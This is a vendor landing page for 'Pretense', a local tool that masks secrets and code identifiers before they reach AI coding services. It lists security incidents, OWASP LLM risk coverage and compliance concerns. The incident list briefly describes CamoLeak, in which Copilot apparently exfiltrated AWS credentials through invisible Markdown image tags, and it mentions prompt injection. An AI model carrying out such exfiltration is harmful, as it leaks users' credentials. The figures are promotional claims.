Active threat landscape: updated April 2026

The AI Coding Security Crisis Is Real

Real incidents, real fines, real data. This is what happens when engineering teams adopt AI coding tools without protection.

29M secrets on GitHub in 20256.4% of Copilot repos leak secretsSamsung banned ChatGPT after 3 leaks in 20 days73% of enterprise AI implementations terminated by security

Documented Incidents

Click any incident to see what happened and how Pretense would have prevented it.

CRITICALMarch 2023

Samsung: Proprietary Code via ChatGPT

Engineers at Samsung Semiconductor sent proprietary source code, meeting notes, and hardware specs to ChatGPT for debugging help.

CVSS CriticalFebruary 2026

Moltbook: 1.5M API Keys in Vibe-Coded App

A vibe-coded app built using AI assistants committed 1.5 million third-party API keys to a public repository. The AI-generated code lacked secrets hygiene.

CVSS 9.6August 2025

CamoLeak: AWS Keys via Copilot Invisible Markdown

CamoLeak (CVSS 9.6) demonstrated that GitHub Copilot could silently exfiltrate AWS credentials by embedding them in invisible Markdown image tags within AI-generated code suggestions.

HIGH2024

GitHub Copilot Secret Leak Rate: 6.4%

CUHK research published at ACM FSE 2024 found that repositories using GitHub Copilot leak secrets at a 6.4% rate versus 4.6% for non-Copilot repos. That is 40% higher.

CRITICALMarch 2026

LiteLLM Supply Chain: All API Keys Stolen

LiteLLM, a popular LLM proxy with 41.8K GitHub stars, was compromised via a supply-chain attack. All API keys routed through it were exposed.

OWASP LLM Top 10 Coverage

The OWASP LLM Top 10 defines the canonical AI security risk taxonomy. Here is where Pretense stands today.

OWASP ID
Risk
Coverage
Notes
LLM01
Prompt Injection
Partial
Mutation renders exfiltrated data non-actionable. Attacker gets synthetic tokens, not real identifiers.
LLM02
Sensitive Information Disclosure
Strong
30+ secret patterns + Shannon entropy analysis. Secrets blocked; identifiers mutated.
LLM05
Improper Output Handling
Roadmap
Phase 8: response scanner will sanitize AI output before applying to codebase.
LLM06
Excessive Agency
Partial
Claude Code hooks (PreToolUse / PostToolUse) intercept file writes and tool calls.
LLM07
System Prompt Leakage
Strong
No raw secrets or identifiers reach the system prompt. Mutation runs before any API call.

Source: OWASP Top 10 for LLM Applications v1.1 (2025). Roadmap items tracked in the public changelog.

Organizations That Banned AI Coding Tools

81% of developers have security concerns about AI agents. 26% have been blocked by IT/InfoSec from using AI tools at work.

Samsung

Source code + meeting data leaked via ChatGPT (2023)

Apple

Internal data security: no public AI tool approval process

JPMorgan Chase

Regulatory compliance: SEC AI guidance

Goldman Sachs

Client data confidentiality requirements

Wells Fargo

OCC/Federal Reserve AI governance requirements

Deutsche Bank

BaFin AI governance + GDPR controls

Northrop Grumman

ITAR/EAR export control restrictions

US Congress

Capitol classified network security policy

The problem: Banning tools costs more than protecting them. A developer who loses access to AI coding tools loses 30–55% productivity (GitHub/McKinsey 2024). Pretense lets security teams say yes instead of no.

Compliance Requirements

Regulations written before AI coding tools existed now govern how you use them. The gaps are not theoretical. They are audit findings.

HIPAA

§164.312 - Technical Safeguards

Standard AI SaaS accounts have no Business Associate Agreement (BAA). Sending any code referencing PHI (patient IDs, diagnosis codes, FHIR paths). This is an automatic HIPAA violation.

Consequence

OCR fines up to $1.9M per violation category. Healthcare devs effectively blocked from AI tools.

GDPR

Art. 44 - Third Country Transfers

Italy's data protection authority fined OpenAI €15M in December 2024. EU developers sending code with personal data identifiers to US-hosted APIs risk similar enforcement.

Consequence

4% of global annual revenue or €20M, whichever is higher. US API endpoints = non-adequate third country.

PCI-DSS v4

Full enforcement April 2025

PCI-DSS v4 Requirement 6.3.3 mandates that all software components are reviewed for security. Payment function names and variable identifiers sent to external AI = automatic audit finding.

Consequence

Loss of card processing ability. Fines of $5K–$100K/month from card brands. QSA audit failure.

SOC2 CC6.7

Logical Access Controls

Auditors now explicitly ask: 'What controls govern employee use of AI coding tools?' Most engineering teams have no documented answer, no controls, and no audit trail.

Consequence

SOC2 Type II failure. Loss of enterprise contracts that require SOC2 attestation.

Pretense vs The Problem

Same developer workflow. Same AI response quality. Zero proprietary identifiers leave your machine.

Without Pretense: raw prompt
// Your code - sent to Anthropic as-is
async function getUserToken(userId: string) {
  const ANTHROPIC_API_KEY = process.env.ANTHROPIC_API_KEY;
  const user = await processPaymentData(userId);
  return generateAuthToken(user, ANTHROPIC_API_KEY);
}
With Pretense: protected prompt
// What Anthropic actually receives
async function _fn4a2b(_v9c1e: string) {
  // [BLOCKED] credential removed by Pretense
  const _v3d7f = await _fn8c3d(_v9c1e);
  return _fn2a4b(_v3d7f);
}
// Restored response is byte-identical to original
0
secrets leaked
Credentials blocked before any API call
100%
response fidelity
Byte-exact round-trip: no context loss
12ms
avg scan time
Local-only: no cloud latency added

Protect your team's code today

30-second deploy. Local-first. The same protection Samsung needed before 2023. Available now, free, in your terminal.

$npm install -g pretense && pretense init

No telemetry · No cloud dependency · Local-first architecture

Ask me anything